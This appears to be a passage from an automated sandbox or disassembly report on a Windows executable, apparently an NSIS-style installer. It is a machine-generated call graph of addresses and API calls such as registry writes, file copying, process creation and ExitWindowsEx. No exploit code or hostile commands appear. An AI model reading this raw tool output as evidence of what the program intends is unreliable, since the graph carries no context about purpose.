4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 
4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad 
SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 
3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API 
calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 
4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a KiUserCallbackDispatcher KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 
3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 
3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 
3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 
3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 
4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 
4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 
403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                    • String ID: jF
                                                                                                                                                                                                                                                    APIs
